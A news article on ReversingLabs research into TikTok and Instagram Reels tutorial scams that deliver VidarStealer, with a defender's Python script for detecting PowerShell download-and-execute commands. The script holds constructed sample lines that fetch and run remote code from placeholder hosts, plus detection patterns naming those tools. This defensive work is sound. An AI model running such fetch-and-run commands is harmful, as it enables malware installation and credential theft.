From Reels to risks: How scammers are turning videos into malware traps
Cybercriminals are moving beyond email scams and into social media feeds, using tutorial-style videos on TikTok and Instagram to spread malware and steal credentials
Not every tutorial is what it seems. Scammers are hiding malware behind viral videos, fake tech tips, and
You are scrolling through Instagram when a video appears showing how to unlock Spotify Premium for free. The clip has a polished voiceover, simple step-by-step instructions, and more than 100,000 views. It looks no different from the countless tutorials users save and revisit every day. You follow the steps. Days later, your passwords, financial information, and stored credentials are in someone else's hands.
That scenario is no longer hypothetical. Researchers at ReversingLabs recently uncovered two separate cybercrime campaigns operating through TikTok and Instagram Reels, using tutorial-style short videos to trick users into downloading malware or handing over sensitive information through malicious websites. The attacks succeed not because they are highly sophisticated, but because they feel familiar, carefully designed to blend into platforms users already trust.
At the centre of these campaigns is VidarStealer, a malware-as-a-service infostealer built to harvest passwords, browser data, cryptocurrency wallet information, and other credentials. With subscriptions reportedly starting at around $300, the tool has dramatically lowered the barrier to entry for cybercriminals, making large-scale social media scams easier and cheaper to launch than ever before.
How social media became a malware playground
Researchers at cybersecurity firm ReversingLabs (RL) have documented two social engineering attack techniques that target users through short-form videos, primarily on TikTok and Instagram Reels. The campaigns, which promise free access to paid software like Spotify Premium and Microsoft Word, represent a significant evolution in how phishing operates. Instead of phishing emails, cybercriminals are now hiding in plain sight on social media, blending their schemes into the creator content users trust and engage with daily.
People are already looking for scams in their email inboxes and text messages, but not as much on their social media feeds, especially when posts are framed as being helpful rather than carrying the urgency or sob stories associated with stereotypical phishing attempts.
That shift in framing is precisely what makes these campaigns effective. A tutorial about unlocking Spotify Premium looks, in every respect, like the thousands of legitimate life-hack videos that populate a user's feed. There is no misspelled domain name in a subject line, no unfamiliar sender. There is just a video, and it looks like every other video.
Using social media is free and rewards frequent uploads. By using multiple platforms, accounts, and posts, attackers are able to access many users. The economics are attractive: no bulk email infrastructure, no cost per send, and a built-in recommendation engine willing to do the distribution work.
The growing role of social media as a search and discovery platform
Social media platforms are no longer just spaces for entertainment; they have quietly become the internet's new search layer. Google itself has confirmed that over 40 percent of Gen Z prefer Instagram or TikTok over Google for search, while Google usage among Gen Z has dropped by nearly 25 percent compared to Gen X. According to GRIN's report, The Power of Influence, Instagram now leads product discovery among Gen Z at 30.4 percent, followed by TikTok at 23.2 percent, with Google trailing at 18.8 percent. Users are not just passively scrolling; they are actively searching for software guides, tech fixes, and product recommendations through the feed.
This behavioural shift has created a significant opening for attackers. On TikTok, people do not just scroll for inspiration, but actively look for answers, whether finding a restaurant, a solution to a problem, or an honest product review, increasingly going straight to TikTok instead of Google.
The malicious campaigns documented by ReversingLabs are built precisely for this environment, using descriptions and tags to make content appear as legitimate customer support pages, positioning themselves directly in the path of users who are already looking for help. When the feed doubles as a search engine, a malicious tutorial is only one recommendation away.
Two campaigns, two playbooks
RL's researchers identified two distinct approaches, each designed to game social media differently.
The first involves fake tutorial accounts built to impersonate legitimate tech support. The malicious accounts use usernames like "windows.tips" or "windows.insights" and the same blue and white profile picture, mirroring the colour palette of the official Windows social media account to establish credibility. The videos themselves are clean and professional, featuring what appear to be AI-generated voiceovers walking viewers through step-by-step instructions, for instance, how to access Windows PowerShell and run a command to supposedly unlock Spotify Premium for free.
A non-technical user would not know any better and may assume the tutorial is legitimate. Attackers rely on this lack of understanding. The command used will download scripts from a specified address, and some users may believe the domain is Microsoft-affiliated or otherwise trustworthy. What is actually downloaded is something else entirely.
The file delivered through the command is identified as VidarStealer, a popular infostealer malware-as-a-service (MaaS) offering that steals credentials, financial information, and tokens from victims. With an affordable $300 lifetime licence, it is widely used by malicious actors, with usage documented across fake game cheats, malvertising campaigns, and more.
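For defenders, the first campaign's "paste this into PowerShell" step leaves a trace in process-creation logs. The sketch below is an added example, not code from ReversingLabs or from this article: it flags PowerShell command lines that both fetch remote content and execute it, including when wrapped in `-EncodedCommand`. It assumes command-line logging is enabled (for example Windows event 4688 or Sysmon event 1); the token lists are a starting set and the sample lines and domains are constructed.

```python
import base64
import re

# Starting token sets, not exhaustive: remote fetch, and run-a-string-as-code.
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|"
                   r"downloadstring|downloadfile)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
ENCODED = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"()|;]+", re.I)
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)

def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand body (base64 of UTF-16LE), if any."""
    match = ENCODED.search(cmdline)
    if not match:
        return cmdline
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not a decodable payload; inspect the raw text only
    return cmdline + " " + decoded

def assess(cmdline):
    """Return a finding if a PowerShell command line fetches AND runs remote code."""
    if not POWERSHELL.search(cmdline):
        return None
    text = expand_encoded(cmdline)
    if FETCH.search(text) and EXEC.search(text):
        return {"urls": URL.findall(text), "encoded": text != cmdline}
    return None

def encode(script):
    """Helper for building the constructed encoded sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process-creation command lines (not taken from the campaigns).
SAMPLES = [
    r'powershell.exe -NoProfile -Command "iex (irm https://cdn.example.invalid/setup)"',
    "powershell -w hidden -enc " + encode("iwr https://files.example.invalid/a.ps1 | iex"),
    r'powershell.exe -Command "Get-ChildItem C:\Users\Public"',
    r'pwsh -Command "Invoke-WebRequest https://example.invalid/r.csv -OutFile r.csv"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(assess(line), "<-", line[:60])
```

A plain download with no execution step (the last sample) is deliberately not flagged, so the rule stays quiet on routine scripted downloads.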
The second campaign takes a different approach. It relies on short videos set to trending music, showing off features of premium software with on-screen text claiming the user has unlocked them for free. The accounts behind these videos look like regular users at first glance, but their profiles are typically filled with repetitive, near-identical clips promoting free access to services like Spotify Premium and similar tools.
These vague videos prompt users to ask questions in the comments, wondering how the poster managed to get free access. This curiosity plays directly into what the attacker wants. Some videos actively encourage viewers to comment with certain phrases, a strategy borrowed from non-malicious creators like recipe writers who use it to build engagement and foster an audience relationship. Once engagement builds, the attacker replies with directions pointing toward malicious download sites.
Why social media video is trusted more
The success of both campaigns is not accidental. It is rooted in how users relate to video content. What makes these videos dangerous is how clean and professional they are, creating a false sense of authority. Tutorials are frequently liked and saved, as users want to return to them. Saving is a valuable interaction for posts, causing the platform algorithm to push content to more users.
Users may also share tutorials, creating more engagement that content-serving algorithms favour. In one documented example, a video with over 100,000 views had nearly 200 more saves than likes, demonstrating how attackers are specifically targeting the more algorithmically valuable forms of engagement. Each save is a vote of confidence in the algorithm's eyes and a further amplification of reach.
This is a deliberate strategy, not incidental. Attackers understand how platform recommendation systems work and produce content calibrated to exploit them.
The role of AI in scaling attacks
Running a social media account takes very little time, and with AI voice and video generation, videos are becoming easier to mass-produce. Social media provides ample opportunities for attackers to access victims, and there will likely be increasing numbers of these accounts and videos in the coming years.
The ReversingLabs analysis found that at least some of these tutorial videos already use AI-generated voiceovers, giving them a polished quality that signals legitimacy to casual viewers. As AI generation tools become more accessible and cheaper, the barrier to producing convincing, high-volume campaigns drops further. What once required a professional setup — like clean graphics, a confident voice, and a plausible script — can now be assembled in minutes.
Tools such as ChatGPT, Gemini, Midjourney, Adobe Firefly, Runway, and ElevenLabs have dramatically lowered the barrier to content creation. What once required design skills, video-editing software, or professional voiceover equipment can now be produced in minutes using AI-generated images, videos, and audio. This accessibility is not only helping creators but also making it easier for cybercriminals to produce convincing scam content at scale.
Why platforms are struggling to respond
These techniques are difficult to defend against, like any social engineering method. Users who identify the malicious intent may try to warn others in the comments, but most platforms allow creators to delete comments and block commenters, so diligent attackers can suppress this resistance.
Reporting suspicious videos does not always lead to quick action. In their investigation, ReversingLabs researchers reported several scam-related posts on Instagram, but the platform rejected those reports. This highlights a broader challenge for social media companies: harmful content can remain online even after users flag it.
Part of the problem is that moderation systems do not always recognise these videos as dangerous. Even when a report is reviewed by a person, they may not have the cybersecurity expertise needed to understand how a seemingly harmless tutorial could be directing users to malware or phishing websites. As a result, scam videos can continue to spread and attract victims before they are eventually removed, if they are removed at all.
Even when a social media video or account is taken down, it is likely only after it has amassed a large number of views, and threat actors can easily start anew.
The structural mismatch between how fast bad content spreads and how slowly platforms respond creates a window that attackers are actively exploiting.
Removing a scam video or banning an account does not necessarily solve the problem. By the time platforms take action, the content may have already reached thousands or even millions of users. In many cases, attackers have already achieved their goal of spreading malware or collecting personal information.
What makes the issue even harder to tackle is how quickly cybercriminals can create new accounts and upload fresh content. While harmful videos can spread within hours, platform moderation and review processes often take much longer. This gap between the speed of attackers and the speed of enforcement allows cybercriminals to continue targeting users and expanding their reach.
What platforms and users can do to stay protected
Social media scams are becoming harder to spot because they often look like ordinary tutorials or product recommendations. As attackers adapt their tactics, both users and organisations need to broaden their approach to online safety.
Recommended precautions
- Audit software installation permissions
- Update phishing awareness training
- Treat social media as a phishing vector
- Report suspicious videos and accounts
- Be cautious of "free premium software" claims
One of the key defences against this kind of attack is to regularly audit permissions, ensuring people with installation privileges understand what they are installing. Most examples described in the analysis involve leisure software, but some promise access to professional software, which employees may deem useful enough to attempt to install on work devices.
Phishing training also needs to be maintained and kept up to date so people are aware of the evolving threat landscape. Organisations must broaden their awareness of a variety of vectors and focus on more than just the typical avenues of phishing.
Users are encouraged to report suspicious social media advice even when using personal social media on personal devices. The more reports filed, the more likely it is that accounts are taken down, which does slow down the momentum of attackers.
The unfortunate reality is that these techniques work. Videos are reaching hundreds of thousands of views, thousands of saves, likes, and shares, and hundreds of comments. These signals are hugely influential on how well content performs, and these techniques exploit that. The threat, in other words, is not theoretical. It is already reaching a very large audience, one scroll at a time.
First Published: Jun 12 2026 | 4:45 PM IST
